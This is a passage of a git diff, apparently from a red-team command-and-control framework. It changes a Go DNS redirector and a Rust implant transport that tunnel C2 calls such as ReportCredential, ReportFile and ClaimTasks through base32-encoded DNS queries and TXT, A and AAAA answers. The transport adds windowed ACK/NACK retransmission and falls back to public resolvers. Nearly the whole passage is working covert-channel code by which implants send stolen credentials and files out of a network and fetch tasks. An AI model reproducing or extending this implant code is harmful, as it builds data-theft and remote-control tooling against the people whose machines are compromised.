stat.Code() == codes.OK || stat.Code() == codes.Unavailable { + if isServerStreaming { + // For server streaming (FetchAsset), receive multiple chunks with length prefixes + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + // Check for EOF (normal end of stream) + if strings.Contains(err.Error(), "EOF") { break } + return nil, fmt.Errorf("failed to receive message: %w", err) } - // For streaming responses, we may receive multiple messages - if err.Error() == "EOF" { - break - } - return nil, fmt.Errorf("failed to receive message: %w", err) - } - // Append message data - if len(msg) > 0 { - if isServerStreaming { - // For server streaming, add 4-byte length prefix before each response chunk + if len(msg) > 0 { + // Add 4-byte length prefix before each response chunk lengthPrefix := make([]byte, 4) binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) responseData = append(responseData, lengthPrefix...) responseData = append(responseData, msg...) - } else { - // For unary, just append the response as-is (no length prefix) - responseData = append(responseData, msg...) + responseCount++ } - responseCount++ + } + slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) + } else { + // For unary, receive single response + if err := stream.RecvMsg(&responseData); err != nil { + return nil, fmt.Errorf("failed to receive response: %w", err) } } - slog.Debug("received responses", "method", methodPath, "count", responseCount, "total_bytes", len(responseData)) - return responseData, nil } -// parseDomainNameAndType extracts both domain name and query type from DNS question +// parseDomainNameAndType extracts domain name and query type func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { var labels []string offset := 0 - // Parse domain name for offset < len(data) { length := int(data[offset]) if length == 0 { - offset++ break } offset++ if offset+length > len(data) { - return "", 0, fmt.Errorf("invalid label length") + return "", 0, fmt.Errorf("invalid domain name") } label := string(data[offset : offset+length]) @@ -837,7 +605,9 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) offset += length } - // Parse query type (2 bytes after domain name) + // Skip the null terminator (0x00) + offset++ + if offset+2 > len(data) { return "", 0, fmt.Errorf("query too short for type field") } @@ -848,20 +618,53 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) return domain, queryType, nil } -// sendDNSResponse sends a DNS response with the appropriate record type -// Returns true if response was sent successfully, false if it failed -func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, data []byte, queryType uint16) bool { +// sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) +// For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { + // For A/AAAA records, base32-encode data first (client expects to decode it) + if queryType == aRecordType || queryType == aaaaRecordType { + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + data = []byte(encoded) + } + + // Determine chunk size and number of answer records needed + var recordSize int + var answerCount uint16 + + switch queryType { + case txtRecordType: + // TXT can handle all data in one record (with internal chunking) + recordSize = 0 // Special case - handled separately + answerCount = 1 + case aRecordType: + recordSize = 4 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + case aaaaRecordType: + recordSize = 16 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + default: + // Unknown type - single empty record + recordSize = 0 + answerCount = 1 + } + response := make([]byte, 0, 512) // DNS Header response = append(response, byte(transactionID>>8), byte(transactionID)) - response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) // Flags: Response, no error - response = append(response, 0x00, 0x01) // Questions: 1 - response = append(response, 0x00, 0x01) // Answers: 1 - response = append(response, 0x00, 0x00) // Authority RRs: 0 - response = append(response, 0x00, 0x00) // Additional RRs: 0 + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, byte(answerCount>>8), byte(answerCount&0xFF)) // Answers: multiple for A/AAAA + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 - // Question section (echo the question) + // Question section - echo back the original query type for _, label := range strings.Split(domain, ".") { if len(label) == 0 { continue @@ -869,77 +672,100 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, byte(len(label))) response = append(response, []byte(label)...) } - response = append(response, 0x00) // End of domain - response = append(response, 0x00, byte(queryType)) // Type: echo query type - response = append(response, 0x00, byte(dnsClassIN)) // Class: IN - - // Answer section - // Name (pointer to question) - response = append(response, byte(dnsPointerToQuestion>>8), byte(dnsPointerToQuestion&0xFF)) - // Type: echo query type - response = append(response, 0x00, byte(queryType)) - // Class: IN - response = append(response, 0x00, byte(dnsClassIN)) - // TTL: dnsTTLSeconds - response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) - - // Build RDATA based on query type - var rdata []byte + response = append(response, 0x00) // End of domain + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + // Answer section - build multiple records for A/AAAA switch queryType { case txtRecordType: - // TXT record: split data into txtMaxChunkSize-byte chunks - txtData := data - var txtChunks [][]byte - for len(txtData) > 0 { - chunkSize := len(txtData) - if chunkSize > txtMaxChunkSize { - chunkSize = txtMaxChunkSize + // TXT record: single record with length-prefixed strings (split into 255-byte chunks) + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + var rdata []byte + if len(data) == 0 { + rdata = []byte{0x00} // Empty TXT string + } else { + // Split into 255-byte chunks + tempData := data + for len(tempData) > 0 { + chunkSize := len(tempData) + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize + } + rdata = append(rdata, byte(chunkSize)) + rdata = append(rdata, tempData[:chunkSize]...) + tempData = tempData[chunkSize:] } - txtChunks = append(txtChunks, txtData[:chunkSize]) - txtData = txtData[chunkSize:] } - // If no data, add an empty TXT string - if len(txtChunks) == 0 { - txtChunks = append(txtChunks, []byte{}) - } - - // Build TXT RDATA - for _, chunk := range txtChunks { - rdata = append(rdata, byte(len(chunk))) - rdata = append(rdata, chunk...) - } + // RDLENGTH and RDATA + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + response = append(response, rdata...) case aRecordType: - // Pad to 4 bytes (data already validated to fit) - rdata = make([]byte, 4) - copy(rdata, data) + // Multiple A records - 4 bytes each + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aRecordType)) // Type: A + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + // RDLENGTH: always 4 for A records + response = append(response, 0x00, 0x04) + + // RDATA: 4 bytes from data, padded with zeros if needed + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 4) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } case aaaaRecordType: - // Pad to 16 bytes (data already validated to fit) - rdata = make([]byte, 16) - copy(rdata, data) + // Multiple AAAA records - 16 bytes each + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + // RDLENGTH: always 16 for AAAA records + response = append(response, 0x00, 0x10) + + // RDATA: 16 bytes from data, padded with zeros if needed + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 16) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } default: - // Unsupported record type, fallback to TXT - slog.Warn("unsupported query type, using TXT", "query_type", queryType) - rdata = []byte{byte(len(data))} - rdata = append(rdata, data...) + // Unknown type - single empty record + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + response = append(response, 0x00, 0x00) // RDLENGTH: 0 } - // RDLENGTH - response = append(response, byte(len(rdata)>>8), byte(len(rdata))) - // RDATA - response = append(response, rdata...) - - // Send response - _, err := conn.WriteToUDP(response, addr) - if err != nil { - slog.Error("failed to send DNS response", "error", err) - return false - } - return true + conn.WriteToUDP(response, addr) } // sendErrorResponse sends a DNS error response @@ -947,148 +773,7 @@ func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, tra response := make([]byte, dnsHeaderSize) binary.BigEndian.PutUint16(response[0:2], transactionID) response[2] = byte(dnsErrorFlags >> 8) - response[3] = byte(dnsErrorFlags & 0xFF) // RCODE: Name Error + response[3] = byte(dnsErrorFlags & 0xFF) conn.WriteToUDP(response, addr) } - -// sendBenignResponse sends a benign DNS response for resolver queries -func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { - var data []byte - switch queryType { - case aRecordType: - data = []byte{localhostIPv4Octet1, 0, 0, localhostIPv4Octet4} // 127.0.0.1 - case aaaaRecordType: - data = make([]byte, 16) // ::1 - data[localhostIPv6Byte15] = localhostIPv6Byte15 - default: - data = []byte{} // empty response - } - r.sendDNSResponse(conn, addr, transactionID, domain, data, queryType) -} - -// generateConvID generates a random conversation ID -func generateConvID() string { - const chars = "0123456789abcdefghijklmnopqrstuvwxyz" - b := make([]byte, convIDSize) - for i := range b { - b[i] = chars[rand.Intn(len(chars))] - } - return string(b) -} - -// codeToMethod maps 2-character method code to gRPC path -// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, -// -// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput -func codeToMethod(code string) string { - methods := map[string]string{ - "ct": "/c2.C2/ClaimTasks", - "fa": "/c2.C2/FetchAsset", - "rc": "/c2.C2/ReportCredential", - "rf": "/c2.C2/ReportFile", - "rp": "/c2.C2/ReportProcessList", - "rt": "/c2.C2/ReportTaskOutput", - } - - if path, ok := methods[code]; ok { - return path - } - - return "/c2.C2/ClaimTasks" -} - -// encodeBase36 encodes an integer to base36 string with specified number of digits -func encodeBase36(value int, digits int) string { - const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - result := make([]byte, digits) - for i := digits - 1; i >= 0; i-- { - result[i] = base36[value%base36Radix] - value /= base36Radix - } - return string(result) -} - -// decodeBase36 decodes a base36 string to an integer -func decodeBase36(encoded string) (int, error) { - val := func(c byte) (int, error) { - switch { - case c >= '0' && c <= '9': - return int(c - '0'), nil - case c >= 'a' && c <= 'z': - return int(c-'a') + 10, nil - default: - return 0, fmt.Errorf("invalid base36 character: %c", c) - } - } - - result := 0 - for _, c := range []byte(encoded) { - digit, err := val(c) - if err != nil { - return 0, err - } - result = result*base36Radix + digit - } - return result, nil -} - -// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) -func encodeSeq(seq int) string { - return encodeBase36(seq, 5) -} - -// decodeSeq decodes 5-character base36 sequence number -func decodeSeq(encoded string) (int, error) { - if len(encoded) != 5 { - return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) - } - return decodeBase36(encoded) -} - -// EncodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) -func EncodeBase36CRC(crc int) string { - return encodeBase36(crc, 4) -} - -// decodeBase36CRC decodes 4-character base36 CRC value -func decodeBase36CRC(encoded string) (int, error) { - if len(encoded) != 4 { - return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) - } - return decodeBase36(encoded) -} - -// CalculateCRC16 computes CRC16-CCITT checksum -func CalculateCRC16(data []byte) uint16 { - var crc uint16 = crc16Init - for _, b := range data { - crc ^= uint16(b) << 8 - for i := 0; i < 8; i++ { - if (crc & crc16HighBit) != 0 { - crc = (crc << 1) ^ crc16Polynomial - } else { - crc <<= 1 - } - } - } - return crc -} - -// encodeBase32 encodes data to lowercase base32 without padding -func encodeBase32(data []byte) string { - if len(data) == 0 { - return "" - } - encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) - return strings.ToLower(encoded) -} - -// decodeBase32 decodes lowercase base32 data without padding -func decodeBase32(encoded string) ([]byte, error) { - if len(encoded) == 0 { - return []byte{}, nil - } - encoded = strings.ToUpper(encoded) - return base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(encoded) -} From 66cbc55024270f670ff21f5da228a3263f849c00 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 23:07:48 -0600 Subject: [PATCH 06/17] working, thanks ai! --- implants/lib/pb/src/generated/dns.rs | 35 +- implants/lib/transport/src/dns.rs | 384 ++++++++++++++++---- tavern/internal/c2/dnspb/dns.pb.go | 164 +++++++-- tavern/internal/c2/proto/dns.proto | 16 +- tavern/internal/redirectors/dns/dns.go | 311 ++++++++++++---- tavern/internal/redirectors/dns/dns_test.go | 54 +-- 6 files changed, 720 insertions(+), 244 deletions(-) diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs index 452de3d5e..67665d669 100644 --- a/implants/lib/pb/src/generated/dns.rs +++ b/implants/lib/pb/src/generated/dns.rs @@ -19,6 +19,28 @@ pub struct DnsPacket { /// Optional CRC32 for validation #[prost(uint32, tag = "5")] pub crc32: u32, + /// Async protocol fields for windowed transmission + /// + /// Number of packets client has in-flight + #[prost(uint32, tag = "6")] + pub window_size: u32, + /// Ranges of successfully received chunks (SACK) + #[prost(message, repeated, tag = "7")] + pub acks: ::prost::alloc::vec::Vec, + /// Specific sequence numbers to retransmit + #[prost(uint32, repeated, tag = "8")] + pub nacks: ::prost::alloc::vec::Vec, +} +/// AckRange represents a contiguous range of acknowledged sequence numbers +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct AckRange { + /// Inclusive start of range + #[prost(uint32, tag = "1")] + pub start_seq: u32, + /// Inclusive end of range + #[prost(uint32, tag = "2")] + pub end_seq: u32, } /// InitPayload is the payload for INIT packets /// It contains metadata about the upcoming data transmission @@ -34,6 +56,9 @@ pub struct InitPayload { /// CRC32 checksum of complete request data #[prost(uint32, tag = "3")] pub data_crc32: u32, + /// Total size of the file/data in bytes + #[prost(uint32, tag = "4")] + pub file_size: u32, } /// FetchPayload is the payload for FETCH packets /// It specifies which response chunk to retrieve @@ -67,10 +92,10 @@ pub enum PacketType { Init = 1, /// Send data chunk Data = 2, - /// Finalize request - End = 3, /// Retrieve response chunk - Fetch = 4, + Fetch = 3, + /// Server status response with ACKs/NACKs + Status = 4, } impl PacketType { /// String value of the enum field names used in the ProtoBuf definition. @@ -82,8 +107,8 @@ impl PacketType { PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", PacketType::Init => "PACKET_TYPE_INIT", PacketType::Data => "PACKET_TYPE_DATA", - PacketType::End => "PACKET_TYPE_END", PacketType::Fetch => "PACKET_TYPE_FETCH", + PacketType::Status => "PACKET_TYPE_STATUS", } } /// Creates an enum from field names used in the ProtoBuf definition. @@ -92,8 +117,8 @@ impl PacketType { "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), "PACKET_TYPE_INIT" => Some(Self::Init), "PACKET_TYPE_DATA" => Some(Self::Data), - "PACKET_TYPE_END" => Some(Self::End), "PACKET_TYPE_FETCH" => Some(Self::Fetch), + "PACKET_TYPE_STATUS" => Some(Self::Status), _ => None, } } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 3850d19a5..5ccf5061e 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -14,6 +14,11 @@ const MAX_LABEL_LENGTH: usize = 63; const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; +// Async protocol configuration +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk +const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size + // DNS resolver fallbacks const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; @@ -83,38 +88,40 @@ impl DNS { } /// Calculate maximum data size that will fit in DNS query - fn calculate_max_chunk_size(&self) -> usize { + fn calculate_max_chunk_size(&self, total_chunks: u32) -> usize { // DNS limit: total_length <= 253 - // Format: . - // total_length = encoded_length + num_dots + base_domain_length - // num_dots = ceil(encoded_length / 63) - 1 + 1 = ceil(encoded_length / 63) + // Format: ...... + // total_length = encoded_length + ceil(encoded_length / 63) + base_domain_length let base_domain_len = self.base_domain.len(); + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len); - // Available for encoded data and its dots - let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len + 1); // +1 for dot before base_domain - - // For every 63 chars of encoded data, we need 1 dot - // So: encoded_length + ceil(encoded_length / 63) <= available - // Rearranging: encoded_length <= available * 63 / 64 - let max_encoded_length = (available * 63) / 64; + // Calculate max encoded length where: encoded + ceil(encoded/63) <= available + // For n complete labels (63 chars each): n*63 + n = n*64 + // So: floor(available / 64) * 63 gives us the safe amount + let complete_labels = available / 64; + let max_encoded_length = complete_labels * 63; - // Base32 encoding: 5 bytes -> 8 chars - // So: encoded_length = ceil(protobuf_length * 8 / 5) - // Rearranging: protobuf_length = floor(encoded_length * 5 / 8) + // Base32: 5 bytes protobuf -> 8 chars encoded + // protobuf_length = encoded_length * 5 / 8 let max_protobuf_length = (max_encoded_length * 5) / 8; - // Protobuf overhead: - // - type: 1 byte tag + 1 byte value = 2 bytes - // - sequence: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes - // - conversation_id: 1 byte tag + 1 byte length + 8 bytes string = 10 bytes - // - data: 1 byte tag + varint length (1-2 bytes for our sizes) = 3 bytes - // - crc32: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes - // Total: 2 + 4 + 10 + 3 + 4 = 23 bytes - const PROTOBUF_FIXED_OVERHEAD: usize = 23; - - // Max data size is exactly what fits - max_protobuf_length.saturating_sub(PROTOBUF_FIXED_OVERHEAD) + // Calculate protobuf overhead with worst-case varint sizes + let sample_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: total_chunks, + conversation_id: "a".repeat(CONV_ID_LENGTH), + data: vec![], + crc32: 0xFFFFFFFF, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let overhead = sample_packet.encoded_len(); + + // Max data size is what fits after overhead + max_protobuf_length.saturating_sub(overhead) } /// Encode data using Base32 (DNS-safe, case-insensitive) @@ -172,7 +179,7 @@ impl DNS { /// Send packet and get response with resolver fallback async fn send_packet(&mut self, packet: DnsPacket) -> Result> { let subdomain = self.build_subdomain(&packet)?; - let query = self.build_dns_query(&subdomain)?; + let (query, txid) = self.build_dns_query(&subdomain)?; // Try each DNS server in order let mut last_error = None; @@ -180,7 +187,7 @@ impl DNS { let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); let server = &self.dns_servers[server_idx]; - match self.try_dns_query(server, &query).await { + match self.try_dns_query(server, &query, txid).await { Ok(response) => { // Update current server on success self.current_server_index = server_idx; @@ -197,7 +204,7 @@ impl DNS { } /// Try a single DNS query against a specific server - async fn try_dns_query(&self, server: &str, query: &[u8]) -> Result> { + async fn try_dns_query(&self, server: &str, query: &[u8], expected_txid: u16) -> Result> { // Create UDP socket with timeout let socket = UdpSocket::bind("0.0.0.0:0").await?; socket.connect(server).await?; @@ -213,16 +220,17 @@ impl DNS { .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; buf.truncate(len); - // Parse TXT record from response - self.parse_dns_response(&buf) + // Parse and validate response + self.parse_dns_response(&buf, expected_txid) } - /// Build DNS query packet - fn build_dns_query(&self, domain: &str) -> Result> { + /// Build DNS query packet with random transaction ID + fn build_dns_query(&self, domain: &str) -> Result<(Vec, u16)> { let mut query = Vec::new(); - // Transaction ID - query.extend_from_slice(&[0x12, 0x34]); + // Transaction ID (random for security) + let txid = rand::random::(); + query.extend_from_slice(&txid.to_be_bytes()); // Flags: standard query query.extend_from_slice(&[0x01, 0x00]); // Questions: 1 @@ -262,15 +270,21 @@ impl DNS { // Class: IN (1) query.extend_from_slice(&[0x00, 0x01]); - Ok(query) + Ok((query, txid)) } - /// Parse DNS response based on record type - fn parse_dns_response(&self, response: &[u8]) -> Result> { + /// Parse DNS response based on record type, validating transaction ID + fn parse_dns_response(&self, response: &[u8], expected_txid: u16) -> Result> { if response.len() < 12 { return Err(anyhow::anyhow!("DNS response too short")); } + // Validate transaction ID + let response_txid = u16::from_be_bytes([response[0], response[1]]); + if response_txid != expected_txid { + return Err(anyhow::anyhow!("DNS transaction ID mismatch: expected {}, got {}", expected_txid, response_txid)); + } + // Read answer count from header let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize; @@ -357,64 +371,299 @@ impl DNS { Self::unmarshal_with_codec::(&response_data) } - /// Send raw request bytes and receive raw response bytes using DNS protocol - /// Used for streaming requests like report_file where data is pre-marshaled + /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission + /// Uses windowed transmission with ACK/NACK-based retransmission async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { + use std::collections::{HashSet, HashMap}; + + // Validate data size + if request_data.len() > MAX_DATA_SIZE { + return Err(anyhow::anyhow!( + "Request data exceeds maximum size: {} bytes > {} bytes", + request_data.len(), + MAX_DATA_SIZE + )); + } - // Calculate chunk size based on DNS limits and base domain - let chunk_size = self.calculate_max_chunk_size(); + // Calculate exact chunk_size and total_chunks using varint boundary solving + // Protobuf varints encode differently based on value: + // [1, 127] → 1 byte, [128, 16383] → 2 bytes, [16384, 2097151] → 3 bytes + let (chunk_size, total_chunks) = if request_data.is_empty() { + (self.calculate_max_chunk_size(1), 1) + } else { + let varint_ranges = [ + (1u32, 127u32), + (128u32, 16383u32), + (16384u32, 2097151u32), + ]; + + let mut result = None; + for (min_chunks, max_chunks) in varint_ranges.iter() { + // Calculate overhead assuming worst case (max sequence in this range) + let chunk_size = self.calculate_max_chunk_size(*max_chunks); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + + // Check if the calculated total_chunks falls within this range + if total_chunks >= *min_chunks as usize && total_chunks <= *max_chunks as usize { + // Found the correct range - this is exact + result = Some((chunk_size, total_chunks)); + break; + } + } + + // Fallback for very large data (shouldn't happen with 50MB limit) + result.unwrap_or_else(|| { + let chunk_size = self.calculate_max_chunk_size(2097151); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + (chunk_size, total_chunks) + }) + }; + + let data_crc = Self::calculate_crc32(&request_data); + + log::debug!("DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", + request_data.len(), total_chunks, chunk_size, data_crc); // Generate conversation ID let conv_id = Self::generate_conv_id(); - let total_chunks = (request_data.len() + chunk_size - 1) / chunk_size; - let data_crc = Self::calculate_crc32(&request_data); // Send INIT packet let init_payload = InitPayload { method_code: method_code.to_string(), total_chunks: total_chunks as u32, data_crc32: data_crc, + file_size: request_data.len() as u32, }; let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; + log::debug!("DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", + conv_id, method_code, total_chunks, request_data.len(), data_crc); + let init_packet = DnsPacket { r#type: PacketType::Init.into(), sequence: 0, conversation_id: conv_id.clone(), data: init_payload_bytes, crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], }; - self.send_packet(init_packet).await?; + match self.send_packet(init_packet).await { + Ok(_) => { + log::debug!("DNS: INIT sent for conv_id={}", conv_id); + } + Err(e) => { + return Err(anyhow::anyhow!("Failed to send INIT packet to DNS server: {}.", e)); + } + } + + // Async windowed transmission + let mut acknowledged = HashSet::new(); // Fully acknowledged chunks + let mut nack_set = HashSet::new(); + let mut retry_counts: HashMap = HashMap::new(); + + // Prepare chunks + let chunks: Vec> = request_data + .chunks(chunk_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + // Send all chunks and collect ACKs/NACKs + // In async mode, each DATA packet gets immediate STATUS response via DNS request-response + for seq in 1..=total_chunks { + let seq_u32 = seq as u32; + + // Skip if already acknowledged + if acknowledged.contains(&seq_u32) { + continue; + } + + let chunk = &chunks[seq - 1]; - // Send DATA packets - for (seq, chunk) in request_data.chunks(chunk_size).enumerate() { let data_packet = DnsPacket { r#type: PacketType::Data.into(), - sequence: (seq + 1) as u32, + sequence: seq_u32, conversation_id: conv_id.clone(), - data: chunk.to_vec(), + data: chunk.clone(), crc32: Self::calculate_crc32(chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], }; - self.send_packet(data_packet).await?; + + // Send DATA packet and get STATUS response + match self.send_packet(data_packet).await { + Ok(response_data) => { + // The response could be: + // 1. A marshaled STATUS packet (protobuf) + // 2. Plain "ok" string (backward compat) + // 3. Error response + + // Try to parse as STATUS packet (protobuf) + if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs - mark as acknowledged + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + } + + // Process NACKs - queue for retransmission + for &nack_seq in &status_packet.nacks { + if nack_seq >= 1 && nack_seq <= total_chunks as u32 { + nack_set.insert(nack_seq); + } + } + } + } else if response_data == b"ok" { + // Legacy "ok" response - assume this chunk was accepted + acknowledged.insert(seq_u32); + } else { + // Unknown response format - assume need to retry this chunk + log::debug!("DNS: Unknown response format ({} bytes), retrying chunk", response_data.len()); + nack_set.insert(seq_u32); + } + } + Err(e) => { + // DNS query failed - check if it's a size issue or transient error + let err_msg = e.to_string(); + eprintln!("DNS ERROR: Failed to send chunk {}: {}", seq_u32, err_msg); + + // If packet is too long, this is a fatal error (can't fix with retries) + if err_msg.contains("DNS query too long") { + return Err(anyhow::anyhow!( + "Chunk {} is too large to fit in DNS query: {}", + seq_u32, + err_msg + )); + } + + // Check for connection/network errors + if err_msg.contains("timeout") || err_msg.contains("refused") || err_msg.contains("unreachable") { + eprintln!("DNS ERROR: Connection to DNS server failed."); + } + + // Otherwise, mark for retry (transient network error) + nack_set.insert(seq_u32); + } + } } - // Send END packet - let end_packet = DnsPacket { - r#type: PacketType::End.into(), + // Retry NACKed chunks + while !nack_set.is_empty() { + let nacks_to_retry: Vec = nack_set.drain().collect(); + + for nack_seq in nacks_to_retry { + // Check retry limit + let retries = retry_counts.entry(nack_seq).or_insert(0); + if *retries >= MAX_RETRIES_PER_CHUNK { + return Err(anyhow::anyhow!( + "Max retries exceeded for chunk {}", + nack_seq + )); + } + *retries += 1; + + // Skip if already acknowledged (may have been ACKed in another response) + if acknowledged.contains(&nack_seq) { + continue; + } + + if let Some(chunk) = chunks.get((nack_seq - 1) as usize) { + let retransmit_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: nack_seq, + conversation_id: conv_id.clone(), + data: chunk.clone(), + crc32: Self::calculate_crc32(chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + match self.send_packet(retransmit_packet).await { + Ok(response_data) => { + // Parse STATUS response + if let Ok(status_packet) = DnsPacket::decode(&response_data[..]) { + if status_packet.r#type == PacketType::Status.into() { + // Process ACKs + for ack_range in &status_packet.acks { + for ack_seq in ack_range.start_seq..=ack_range.end_seq { + acknowledged.insert(ack_seq); + retry_counts.remove(&ack_seq); + } + } + + // Process NACKs + for &new_nack in &status_packet.nacks { + if new_nack >= 1 && new_nack <= total_chunks as u32 && !acknowledged.contains(&new_nack) { + nack_set.insert(new_nack); + } + } + } + } + } + Err(_) => { + // Retry failed - add back to NACK set + nack_set.insert(nack_seq); + } + } + } + } + } + + // Verify all chunks acknowledged + if acknowledged.len() != total_chunks { + return Err(anyhow::anyhow!( + "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}", + acknowledged.len(), + total_chunks, + (1..=total_chunks as u32).filter(|seq| !acknowledged.contains(seq)).collect::>() + )); + } + + log::debug!("DNS: All {} chunks acknowledged, sending FETCH", total_chunks); + + // All data sent and acknowledged + // Now request the response via FETCH (or END for backward compatibility) + // Send FETCH packet to get response + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), sequence: (total_chunks + 1) as u32, conversation_id: conv_id.clone(), data: vec![], crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], }; - let end_response = self.send_packet(end_packet).await?; + let end_response = match self.send_packet(fetch_packet).await { + Ok(resp) => { + log::debug!("DNS: FETCH response received ({} bytes)", resp.len()); + resp + } + Err(e) => { + return Err(anyhow::anyhow!( + "Failed to fetch response from server: {}.", + e + )); + } + }; - // Check if END response contains ResponseMetadata (chunked response indicator) - // ResponseMetadata is NOT encrypted - it's plain protobuf - // If response is just "ok", it's a small response and will be in first FETCH - // If response is protobuf metadata, we need multiple FETCHes + // Validate response is not empty + if end_response.is_empty() { + return 